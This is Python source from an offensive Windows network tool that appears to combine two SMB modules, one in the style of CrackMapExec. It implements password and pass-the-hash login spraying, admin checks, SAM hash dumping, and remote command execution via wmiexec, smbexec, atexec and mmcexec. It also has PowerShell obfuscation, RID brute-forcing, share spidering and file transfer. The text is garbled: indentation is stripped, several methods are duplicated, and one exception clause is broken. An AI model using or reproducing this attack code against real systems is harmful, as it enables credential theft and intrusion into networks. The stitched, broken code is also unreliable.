# Backup for Linux/Unix systems
if not self.domain:
self.domain = self.con.getServerName(
) + "." + self.con.getServerDNSDomainName()
################################
# Enumerate Host information
################################
def host_info(self):
try:
self.srvdomain = self.get_domain()
self.host = self.get_hostname()
self.os = self.con.getServerOS()
self.signing = self.con.isSigningRequired()
arch = self.get_os_arch()
if arch == 32 or arch == 64:
self.os_arch = " x{}".format(str(arch))
else:
self.os_arch = ''
except Exception as e:
self.logger.debug("SMB Host Info: {}".format(str(e)))
def get_os_arch(self):
# Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(
MSRPC_UUID_PORTMAP,
transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36',
'1.0'))
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except:
return 0
def get_hostname(self):
if self.con.getServerDNSDomainName() and not self.local_auth:
if self.con.getServerName().lower(
) != self.con.getServerDNSDomainName().lower():
return (self.con.getServerName() + "." +
self.con.getServerDNSDomainName())
else:
return self.con.getServerName()
else:
return self.con.getServerName()
def get_domain(self):
try:
return self.con.getServerDomain()
except:
return self.getServerName()
def list_shares(self):
# name=share['shi1_netname'][:-1], description=share['shi1_remark']
return self.con.listShares()
################################
# Host/Domain Password Policy
################################
def password_policy(self):
SAMRDump(self).dump(self.host)
################################
# List Shares & Check Share Permissions
################################
def read_perm(self, share):
try:
# Silently list path to check access
self.list_path(share, False)
return True
except:
return False
def write_perm(self, share):
try:
# Create dir to check write access
tmp = '.' + ''.join(
[choice(ascii_letters + digits) for x in range(5)])
self.con.createDirectory(share, tmp)
self.con.deleteDirectory(share, tmp)
return True
except Exception as e:
return False
def list_path(self, share, path):
if not path:
path = '/*'
return self.con.listPath(share, path)
################################
# Check if User Admin
################################
def isAdmin(self):
rpctransport = SMBTransport(self.host,
self.port,
r'\svcctl',
smb_connection=self.con)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except:
pass
else:
dce.bind(scmr.MSRPC_UUID_SCMR)
try:
# 0xF003F - SC_MANAGER_ALL_ACCESS
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
ans = scmr.hROpenSCManagerW(dce, '{}\x00'.format(self.host),
'ServicesActive\x00', 0xF003F)
self.admin = True
return True
except scmr.DCERPCException as e:
pass
return False
################################
# Dump SAM / LSA
################################
def enable_remoteops(self):
# Source: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
if self.remote_ops is not None and self.bootkey is not None:
return
try:
self.remote_ops = RemoteOperations(self.con, False, None)
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.fail('RemoteOperations failed for {}: {}'.format(
self.host, str(e)))
def sam(self):
try:
self.enable_remoteops()
def add_sam_hash(sam_hash, host_id):
self.logger.success(
[self.host, highlight("SAM HASH"), sam_hash])
username, _, lmhash, nthash, _, _, _ = sam_hash.split(':')
self.db.update_user(username, '', host_id,
"{}:{}".format(lmhash, nthash))
if self.remote_ops and self.bootkey:
SAMFileName = self.remote_ops.saveSAM()
SAM = SAMHashes(SAMFileName,
self.bootkey,
isRemote=True,
perSecretCallback=lambda secret: add_sam_hash(
secret, self.host))
SAM.dump()
except Exception as e:
self.logger.fail('SAM Extraction Failed for {}: {}'.format(
self.host, str(e)))
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(
"Error calling remote_ops.finish() for {}: {}".format(
self.host, str(e)))
SAM.finish()
################################
# File Interaction
################################
def createFile(self, filename, data, share='C$'):
# Create new file & write data, Not In Use
f = remotefile.RemoteFile(self.con, filename, share)
f.create()
f.write(data)
f.close()
def uploadFile(self, local_file, location, share='C$'):
f = open(local_file)
self.con.putFile(share, location, f.read)
f.close()
def downloadFile(self, remote_file, location='ar3_download', share='C$'):
f = open(location, 'wb')
self.con.getFile(share, remote_file, f.write)
f.close()
return
def deleteFile(self, remote_file, share='C$'):
self.con.deleteFile(share, remote_file)
class smb(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.lmhash = ''
self.nthash = ''
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.smb_share_name = smb_share_name
connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
smb_parser = parser.add_parser('smb', help="own stuff using SMB", parents=[std_parser, module_parser])
smb_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
smb_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2')
dgroup = smb_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
smb_parser.add_argument("--port", type=int, choices={445, 139}, default=445, help="SMB port (default: 445)")
smb_parser.add_argument("--share", metavar="SHARE", default="C$", help="specify a share (default: C$)")
smb_parser.add_argument("--smb-server-port", default="445", help="specify a server port for SMB", type=int)
smb_parser.add_argument("--gen-relay-list", metavar='OUTPUT_FILE', help="outputs all hosts that don't require SMB signing to the specified file")
smb_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
cgroup = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
cegroup = cgroup.add_mutually_exclusive_group()
cegroup.add_argument("--sam", action='store_true', help='dump SAM hashes from target systems')
cegroup.add_argument("--lsa", action='store_true', help='dump LSA secrets from target systems')
cegroup.add_argument("--ntds", choices={'vss', 'drsuapi'}, nargs='?', const='drsuapi', help="dump the NTDS.dit from target DCs using the specifed method\n(default: drsuapi)")
#cgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history')
#cgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account')
egroup = smb_parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating")
egroup.add_argument("--shares", action="store_true", help="enumerate shares and access")
egroup.add_argument("--sessions", action='store_true', help='enumerate active sessions')
egroup.add_argument('--disks', action='store_true', help='enumerate disks')
egroup.add_argument("--loggedon-users", action='store_true', help='enumerate logged on users')
egroup.add_argument('--users', nargs='?', const='', metavar='USER', help='enumerate domain users, if a user is specified than only its information is queried.')
egroup.add_argument("--groups", nargs='?', const='', metavar='GROUP', help='enumerate domain groups, if a group is specified than its members are enumerated')
egroup.add_argument("--local-groups", nargs='?', const='', metavar='GROUP', help='enumerate local groups, if a group is specified than its members are enumerated')
egroup.add_argument("--pass-pol", action='store_true', help='dump password policy')
egroup.add_argument("--rid-brute", nargs='?', type=int, const=4000, metavar='MAX_RID', help='enumerate users by bruteforcing RID\'s (default: 4000)')
egroup.add_argument("--wmi", metavar='QUERY', type=str, help='issues the specified WMI query')
egroup.add_argument("--wmi-namespace", metavar='NAMESPACE', default='root\\cimv2', help='WMI Namespace (default: root\\cimv2)')
sgroup = smb_parser.add_argument_group("Spidering", "Options for spidering shares")
sgroup.add_argument("--spider", metavar='SHARE', type=str, help='share to spider')
sgroup.add_argument("--spider-folder", metavar='FOLDER', default='.', type=str, help='folder to spider (default: root share directory)')
sgroup.add_argument("--content", action='store_true', help='enable file content searching')
sgroup.add_argument("--exclude-dirs", type=str, metavar='DIR_LIST', default='', help='directories to exclude from spidering')
segroup = sgroup.add_mutually_exclusive_group()
segroup.add_argument("--pattern", nargs='+', help='pattern(s) to search for in folders, filenames and file content')
segroup.add_argument("--regex", nargs='+', help='regex(s) to search for in folders, filenames and file content')
sgroup.add_argument("--depth", type=int, default=None, help='max spider recursion depth (default: infinity & beyond)')
sgroup.add_argument("--only-files", action='store_true', help='only spider files')
tgroup = smb_parser.add_argument_group("Files", "Options for put and get remote files")
tgroup.add_argument("--put-file", nargs=2, metavar="FILE", help='Put a local file into remote target, ex: whoami.txt \\\\Windows\\\\Temp\\\\whoami.txt')
tgroup.add_argument("--get-file", nargs=2, metavar="FILE", help='Get a remote file, ex: \\\\Windows\\\\Temp\\\\whoami.txt whoami.txt')
cgroup = smb_parser.add_argument_group("Command Execution", "Options for executing commands")
cgroup.add_argument('--exec-method', choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, default=None, help="method to execute the command. Ignored if in MSSQL mode (default: wmiexec)")
cgroup.add_argument('--force-ps32', action='store_true', help='force the PowerShell command to run in a 32-bit process')
cgroup.add_argument('--no-output', action='store_true', help='do not retrieve command output')
cegroup = cgroup.add_mutually_exclusive_group()
cegroup.add_argument("-x", metavar="COMMAND", dest='execute', help="execute the specified command")
cegroup.add_argument("-X", metavar="PS_COMMAND", dest='ps_execute', help='execute the specified PowerShell command')
psgroup = smb_parser.add_argument_group('Powershell Obfuscation', "Options for PowerShell script obfuscation")
psgroup.add_argument('--obfs', action='store_true', help='Obfuscate PowerShell scripts')
psgroup.add_argument('--clear-obfscripts', action='store_true', help='Clear all cached obfuscated PowerShell scripts')
return parser
def proto_logger(self):
self.logger = CMEAdapter(extra={
'protocol': 'SMB',
'host': self.host,
'port': self.args.port,
'hostname': self.hostname
})
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except (DCERPCException, e):
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
def enum_host_info(self):
self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.conn.login('' , '')
except:
#if "STATUS_ACCESS_DENIED" in e:
pass
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.server_os = self.conn.getServerOS()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
self.os_arch = self.get_os_arch()
self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
if not self.domain:
self.domain = self.hostname
self.db.add_computer(self.host, self.hostname, self.domain, self.server_os)
try:
'''
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
#Re-connect since we logged off
self.create_conn_obj()
def print_host_info(self):
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1))
def kerberos_login(self, aesKey, kdcHost):
# dirty code to check if user is admin but pywerview does not support kerberos auth ...
error = ''
try:
self.conn.kerberosLogin('', '', self.domain, self.lmhash, self.nthash, aesKey, kdcHost)
# self.check_if_admin() # currently pywerview does not support kerberos auth
except SessionError as e:
error = e
try:
self.conn.connectTree("C$")
self.admin_privs = True
except SessionError as e:
pass
if not error:
out = u'{}\\{} {}'.format(self.domain,
self.conn.getCredentials()[0],
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.success(out)
return True
else:
self.logger.error(u'{} {} {}'.format(self.domain,
error,
'({})'.format(desc) if self.args.verbose else ''))
return False
# check https://github.com/byt3bl33d3r/CrackMapExec/issues/321
if self.signing:
try:
self.conn.logoff()
except:
pass
self.create_conn_obj()
def plaintext_login(self, domain, username, password):
try:
self.password = password
self.username = username
self.domain = domain
self.conn.login(username, password, domain)
self.check_if_admin()
self.db.add_credential('plaintext', domain, username, password)
if self.admin_privs:
self.db.add_admin_user('plaintext', domain, username, password, self.host)
out = u'{}\\{}:{} {}'.format(domain,
username,
password,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.success(out)
if not self.args.continue_on_success:
return True
elif self.signing: # check https://github.com/byt3bl33d3r/CrackMapExec/issues/321
try:
self.conn.logoff()
except:
pass
self.create_conn_obj()
except SessionError as e:
error, desc = e.getErrorString()
self.logger.error(u'{}\\{}:{} {} {}'.format(domain,
username,
password,
error,
'({})'.format(desc) if self.args.verbose else ''),
color='magenta' if error in smb_error_status else 'red')
if error not in smb_error_status:
self.inc_failed_login(username)
return False
if not self.args.continue_on_success:
return True
def hash_login(self, domain, username, ntlm_hash):
lmhash = ''
nthash = ''
#This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
try:
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
self.username = username
self.domain = domain
self.conn.login(username, '', domain, lmhash, nthash)
self.check_if_admin()
self.db.add_credential('hash', domain, username, ntlm_hash)
if self.admin_privs:
self.db.add_admin_user('hash', domain, username, ntlm_hash, self.host)
out = u'{}\\{} {} {}'.format(domain,
username,
ntlm_hash,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.success(out)
if not self.args.continue_on_success:
return True
# check https://github.com/byt3bl33d3r/CrackMapExec/issues/321
if self.signing:
try:
self.conn.logoff()
except:
pass
self.create_conn_obj()
except SessionError as e:
error, desc = e.getErrorString()
self.logger.error(u'{}\\{}:{} {} {}'.format(domain,
username,
ntlm_hash,
error,
'({})'.format(desc) if self.args.verbose else ''),
color='magenta' if error in smb_error_status else 'red')
if error not in smb_error_status:
self.inc_failed_login(username)
return False
if not self.args.continue_on_success:
return True
def create_smbv1_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, self.args.port, preferredDialect=SMB_DIALECT)
self.smbv1 = True
except socket.error as e:
if str(e).find('Connection reset by peer') != -1:
logging.debug('SMBv1 might be disabled on {}'.format(self.host))
return False
except Exception as e:
logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
return False
return True
def create_smbv3_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, self.args.port)
self.smbv1 = False
except socket.error:
return False
except Exception as e:
logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
return False
return True
def create_conn_obj(self):
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
def check_if_admin(self):
lmhash = ''
nthash = ''
if self.hash:
if self.hash.find(':') != -1:
lmhash, nthash = self.hash.split(':')
else:
nthash = self.hash
self.admin_privs = invoke_checklocaladminaccess(self.host, self.domain, self.username, self.password, lmhash, nthash)
def gen_relay_list(self):
if self.server_os.lower().find('windows') != -1 and self.signing is False:
with sem:
with open(self.args.gen_relay_list, 'a+') as relay_list:
if self.host not in relay_list.read():
relay_list.write(self.host + '\n')
@requires_admin
@requires_smb_server
def execute(self, payload=None, get_output=False, methods=None):
if self.args.exec_method: methods = [self.args.exec_method]
if not methods : methods = ['wmiexec', 'mmcexec', 'atexec', 'smbexec']
if not payload and self.args.execute:
payload = self.args.execute
if not self.args.no_output: get_output = True
for method in methods:
if method == 'wmiexec':
try:
exec_method = WMIEXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.conn, self.kerberos, self.aesKey, self.kdcHost, self.hash, self.args.share)
logging.debug('Executed command via wmiexec')
break
except:
logging.debug('Error executing command via wmiexec, traceback:')
logging.debug(format_exc())
continue
elif method == 'mmcexec':
try:
exec_method = MMCEXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.conn, self.hash)
logging.debug('Executed command via mmcexec')
break
except:
logging.debug('Error executing command via mmcexec, traceback:')
logging.debug(format_exc())
continue
elif method == 'atexec':
try:
exec_method = TSCH_EXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.kerberos, self.aesKey, self.kdcHost, self.hash) #self.args.share)
logging.debug('Executed command via atexec')
break
except:
logging.debug('Error executing command via atexec, traceback:')
logging.debug(format_exc())
continue
elif method == 'smbexec':
try:
exec_method = SMBEXEC(self.host, self.smb_share_name, self.args.port, self.username, self.password, self.domain, self.kerberos, self.aesKey, self.kdcHost, self.hash, self.args.share)
logging.debug('Executed command via smbexec')
break
except:
logging.debug('Error executing command via smbexec, traceback:')
logging.debug(format_exc())
continue
if hasattr(self, 'server'): self.server.track_host(self.host)
output = u'{}'.format(exec_method.execute(payload, get_output).strip())
if self.args.execute or self.args.ps_execute:
self.logger.success('Executed command {}'.format('via {}'.format(self.args.exec_method) if self.args.exec_method else ''))
buf = StringIO(output).readlines()
for line in buf:
self.logger.highlight(line.strip())
return output
@requires_admin
def ps_execute(self, payload=None, get_output=False, methods=None, force_ps32=False, dont_obfs=False):
if not payload and self.args.ps_execute:
payload = self.args.ps_execute
if not self.args.no_output: get_output = True
if os.path.isfile(payload):
with open(payload) as commands:
for c in commands:
self.execute(create_ps_command(c, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
else:
self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
return ''
def shares(self):
temp_dir = ntpath.normpath("\\" + gen_random_string())
#hostid,_,_,_,_,_,_ = self.db.get_hosts(filterTerm=self.host)[0]
permissions = []
try:
for share in self.conn.listShares():
share_name = share['shi1_netname'][:-1]
share_remark = share['shi1_remark'][:-1]
share_info = {'name': share_name, 'remark': share_remark, 'access': []}
read = False
write = False
try:
self.conn.listPath(share_name, '*')
read = True
share_info['access'].append('READ')
except SessionError:
pass
try:
self.conn.createDirectory(share_name, temp_dir)
self.conn.deleteDirectory(share_name, temp_dir)
write = True
share_info['access'].append('WRITE')
except SessionError:
pass
permissions.append(share_info)
#self.db.add_share(hostid, share_name, share_remark, read, write)
self.logger.success('Enumerated shares')
self.logger.highlight('{:<15} {:<15} {}'.format('Share', 'Permissions', 'Remark'))
self.logger.highlight('{:<15} {:<15} {}'.format('-----', '-----------', '------'))
for share in permissions:
name = share['name']
remark = share['remark']
perms = share['access']
self.logger.highlight(u'{:<15} {:<15} {}'.format(name, ','.join(perms), remark))
except Exception as e:
error, desc = e.getErrorString()
self.logger.error('Error enumerating shares: {}'.format(error),
color='magenta' if error in smb_error_status else 'red')
return permissions
def get_dc_ips(self):
dc_ips = []
for dc in self.db.get_domain_controllers(domain=self.domain):
dc_ips.append(dc[1])
if not dc_ips:
dc_ips.append(self.host)
return dc_ips
def sessions(self):
sessions = get_netsession(self.host, self.domain, self.username, self.password, self.lmhash, self.nthash)
self.logger.success('Enumerated sessions')
for session in sessions:
if session.sesi10_cname.find(self.local_ip) == -1:
self.logger.highlight('{:<25} User:{}'.format(session.sesi10_cname, session.sesi10_username))
return sessions
def disks(self):
disks = []
try:
disks = get_localdisks(self.host, self.domain, self.username, self.password, self.lmhash, self.nthash)
self.logger.success('Enumerated disks')
for disk in disks:
self.logger.highlight(disk.disk)
except Exception as e:
error, desc = e.getErrorString()
self.logger.error('Error enumerating disks: {}'.format(error),
color='magenta' if error in smb_error_status else 'red')
return disks
def local_groups(self):
groups = []
#To enumerate local groups the DC IP is optional, if specified it will resolve the SIDs and names of any domain accounts in the local group
for dc_ip in self.get_dc_ips():
try:
groups = get_netlocalgroup(self.host, dc_ip, '', self.username,
self.password, self.lmhash, self.nthash, queried_groupname=self.args.local_groups,
list_groups=True if not self.args.local_groups else False, recurse=False)
if self.args.local_groups:
self.logger.success('Enumerated members of local group')
else:
self.logger.success('Enumerated local groups')
for group in groups:
if group.name:
if not self.args.local_groups:
self.logger.highlight('{:<40} membercount: {}'.format(group.name, group.membercount))
self.db.add_group(self.hostname, group.name)
else:
domain, name = group.name.split('/')
self.logger.highlight('{}\\{}'.format(domain.upper(), name))
try:
group_id = self.db.get_groups(groupName=self.args.local_groups, groupDomain=domain)[0][0]
except IndexError:
group_id = self.db.add_group(domain, self.args.local_groups)
# yo dawg, I hear you like groups. So I put a domain group as a member of a local group which is also a member of another local group.
# (╯°□°)╯︵ ┻━┻
if not group.isgroup:
self.db.add_user(domain, name, group_id)
elif group.isgroup:
self.db.add_group(domain, name)
break
except Exception as e:
self.logger.error('Error enumerating local groups of {}: {}'.format(self.host, e))
return groups
def domainfromdsn(self, dsn):
dsnparts = dsn.split(',')
domain = ""
for part in dsnparts:
k,v = part.split("=")
if k == "DC":
if domain=="":
domain = v
else:
domain = domain+"."+v
return domain
def groups(self):
groups = []
for dc_ip in self.get_dc_ips():
if self.args.groups:
try:
groups = get_netgroupmember(dc_ip, '', self.username, password=self.password,
lmhash=self.lmhash, nthash=self.nthash, queried_groupname=self.args.groups, queried_sid=str(),
queried_domain=str(), ads_path=str(), recurse=False, use_matching_rule=False,
full_data=False, custom_filter=str())
self.logger.success('Enumerated members of domain group')
for group in groups:
self.logger.highlight('{}\\{}'.format(group.memberdomain, group.membername))
try:
group_id = self.db.get_groups(groupName=self.args.groups, groupDomain=group.groupdomain)[0][0]
except IndexError:
group_id = self.db.add_group(group.groupdomain, self.args.groups)
if not group.isgroup:
self.db.add_user(group.memberdomain, group.membername, group_id)
elif group.isgroup:
self.db.add_group(group.groupdomain, group.groupname)
break
except Exception as e:
self.logger.error('Error enumerating domain group members using dc ip {}: {}'.format(dc_ip, e))
else:
try:
groups = get_netgroup(dc_ip, '', self.username, password=self.password,
lmhash=self.lmhash, nthash=self.nthash, queried_groupname=str(), queried_sid=str(),
queried_username=str(), queried_domain=str(), ads_path=str(),
admin_count=False, full_data=True, custom_filter=str())
self.logger.success('Enumerated domain group(s)')
for group in groups:
self.logger.highlight('{:<40} membercount: {}'.format(group.samaccountname, len(group.member) if hasattr(group, 'member') else 0))
if bool(group.isgroup) is True:
# Since there isn't a groupmemeber attribute on the returned object from get_netgroup we grab it from the distinguished name
domain = self.domainfromdsn(group.distinguishedname)
self.db.add_group(domain, group.samaccountname)
break
except Exception as e:
self.logger.error('Error enumerating domain group using dc ip {}: {}'.format(dc_ip, e))
return groups
def users(self):
users = []
for dc_ip in self.get_dc_ips():
try:
users = get_netuser(dc_ip, '', self.username, password=self.password, lmhash=self.lmhash,
nthash=self.nthash, queried_username=self.args.users, queried_domain='', ads_path=str(),
admin_count=False, spn=False, unconstrained=False, allow_delegation=False,
custom_filter=str())
self.logger.success('Enumerated domain user(s)')
for user in users:
domain = self.domainfromdsn(user.distinguishedname)
self.logger.highlight('{}\\{:<30} badpwdcount: {} baddpwdtime: {}'.format(domain,user.samaccountname,getattr(user,'badpwdcount',0),getattr(user, 'badpasswordtime','')))
self.db.add_user(domain, user.samaccountname)
break
except Exception as e:
logging.debug('Error enumerating domain users using dc ip {}: {}'.format(dc_ip, e))
return users
def loggedon_users(self):
loggedon = []
try:
loggedon = get_netloggedon(self.host, self.domain, self.username, self.password, lmhash=self.lmhash, nthash=self.nthash)
self.logger.success('Enumerated loggedon users')
for user in loggedon:
self.logger.highlight('{}\\{:<25} {}'.format(user.wkui1_logon_domain, user.wkui1_username,
'logon_server: {}'.format(user.wkui1_logon_server) if user.wkui1_logon_server else ''))
except Exception as e:
self.logger.error('Error enumerating logged on users: {}'.format(e))
return loggedon
def pass_pol(self):
return PassPolDump(self).dump()
@requires_admin
def wmi(self, wmi_query=None, namespace=None):
records = []
if not namespace:
namespace = self.args.wmi_namespace
try:
rpc = RPCRequester(self.host, self.domain, self.username, self.password, self.lmhash, self.nthash)
rpc._create_wmi_connection(namespace=namespace)
if wmi_query:
query = rpc._wmi_connection.ExecQuery(wmi_query, lFlags=WBEM_FLAG_FORWARD_ONLY)
else:
query = rpc._wmi_connection.ExecQuery(self.args.wmi, lFlags=WBEM_FLAG_FORWARD_ONLY)
except Exception as e:
self.logger.error('Error creating WMI connection: {}'.format(e))
return records
while True:
try:
wmi_results = query.Next(0xffffffff, 1)[0]
record = wmi_results.getProperties()
records.append(record)
for k,v in record.items():
self.logger.highlight('{} => {}'.format(k,v['value']))
self.logger.highlight('')
except Exception as e:
if str(e).find('S_FALSE') < 0:
raise e
else:
break
return records
def spider(self, share=None, folder='.', pattern=[], regex=[], exclude_dirs=[], depth=None, content=False, onlyfiles=True):
spider = SMBSpider(self.conn, self.logger)
self.logger.info('Started spidering')
start_time = time()
if not share:
spider.spider(self.args.spider, self.args.spider_folder, self.args.pattern,
self.args.regex, self.args.exclude_dirs, self.args.depth,
self.args.content, self.args.only_files)
else:
spider.spider(share, folder, pattern, regex, exclude_dirs, depth, content, onlyfiles)
self.logger.info("Done spidering (Completed in {})".format(time() - start_time))
return spider.results
def rid_brute(self, maxRid=None):
entries = []
if not maxRid:
maxRid = int(self.args.rid_brute)
KNOWN_PROTOCOLS = {
135: {'bindstr': r'ncacn_ip_tcp:%s', 'set_host': False},
139: {'bindstr': r'ncacn_np:{}[\pipe\lsarpc]', 'set_host': True},
445: {'bindstr': r'ncacn_np:{}[\pipe\lsarpc]', 'set_host': True},
}
try:
stringbinding = KNOWN_PROTOCOLS[self.args.port]['bindstr'].format(self.host)
logging.debug('StringBinding {}'.format(stringbinding))
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(self.args.port)
if KNOWN_PROTOCOLS[self.args.port]['set_host']:
rpctransport.setRemoteHost(self.host)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
except Exception as e:
self.logger.error('Error creating DCERPC connection: {}'.format(e))
return entries
# Want encryption? Uncomment next line
# But make SIMULTANEOUS variable <= 100
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
# Want fragmentation? Uncomment next line
#dce.set_max_fragment_size(32)
self.logger.success('Brute forcing RIDs')
dce.bind(lsat.MSRPC_UUID_LSAT)
resp = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)
policyHandle = resp['PolicyHandle']
resp = lsad.hLsarQueryInformationPolicy2(dce, policyHandle, lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation)
domainSid = resp['PolicyInformation']['PolicyAccountDomainInfo']['DomainSid'].formatCanonical()
soFar = 0
SIMULTANEOUS = 1000
for j in range(maxRid//SIMULTANEOUS+1):
if (maxRid - soFar) // SIMULTANEOUS == 0:
sidsToCheck = (maxRid - soFar) % SIMULTANEOUS
else:
sidsToCheck = SIMULTANEOUS
if sidsToCheck == 0:
break
sids = list()
for i in range(soFar, soFar+sidsToCheck):
sids.append(domainSid + '-%d' % i)
try:
lsat.hLsarLookupSids(dce, policyHandle, sids,lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)
except DCERPCException as e:
if str(e).find('STATUS_NONE_MAPPED') >= 0:
soFar += SIMULTANEOUS
continue
elif str(e).find('STATUS_SOME_NOT_MAPPED') >= 0:
resp = e.get_packet()
else:
raise
for n, item in enumerate(resp['TranslatedNames']['Names']):
if item['Use'] != SID_NAME_USE.SidTypeUnknown:
rid = soFar + n
domain = resp['ReferencedDomains']['Domains'][item['DomainIndex']]['Name']
user = item['Name']
sid_type = SID_NAME_USE.enumItems(item['Use']).name
self.logger.highlight("{}: {}\\{} ({})".format(rid, domain, user, sid_type))
entries.append({'rid': rid, 'domain': domain, 'username': user, 'sidtype': sid_type})
soFar += SIMULTANEOUS
dce.disconnect()
return entries
@requires_admin
def put_file(self):
self.logger.info('Copy {} to {}'.format(self.args.put_file[0], self.args.put_file[1]))
with open(self.args.put_file[0], 'rb') as file:
try:
self.conn.putFile(self.args.share, self.args.put_file[1], file.read)
self.logger.success('Created file {} on \\\\{}{}'.format(self.args.put_file[0], self.args.share, self.args.put_file[1]))
except Exception as e:
self.logger.error('Error writing file to share {}: {}'.format(self.args.share, e))
@requires_admin
def get_file(self):
self.logger.info('Copy {} to {}'.format(self.args.get_file[0], self.args.get_file[1]))
with open(self.args.get_file[1], 'wb+') as file:
try:
self.conn.getFile(self.args.share, self.args.get_file[0], file.write)
self.logger.success('File {} was transferred to {}'.format(self.args.get_file[0], self.args.get_file[1]))
except Exception as e:
self.logger.error('Error reading file {}: {}'.format(self.args.share, e))
def enable_remoteops(self):
if self.remote_ops is not None and self.bootkey is not None:
return
try:
self.remote_ops = RemoteOperations(self.conn, False, None) #self.__doKerberos, self.__kdcHost
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.error('RemoteOperations failed: {}'.format(e))
@requires_admin
def sam(self):
self.enable_remoteops()
host_id = self.db.get_computers(filterTerm=self.host)[0][0]
def add_sam_hash(sam_hash, host_id):
add_sam_hash.sam_hashes += 1
self.logger.highlight(sam_hash)
username,_,lmhash,nthash,_,_,_ = sam_hash.split(':')
self.db.add_credential('hash', self.hostname, username, ':'.join((lmhash, nthash)), pillaged_from=host_id)
add_sam_hash.sam_hashes = 0
if self.remote_ops and self.bootkey:
#try:
SAMFileName = self.remote_ops.saveSAM()
SAM = SAMHashes(SAMFileName, self.bootkey, isRemote=True, perSecretCallback=lambda secret: add_sam_hash(secret, host_id))
self.logger.success('Dumping SAM hashes')
SAM.dump()
SAM.export(self.output_filename)
self.logger.success('Added {} SAM hashes to the database'.format(highlight(add_sam_hash.sam_hashes)))
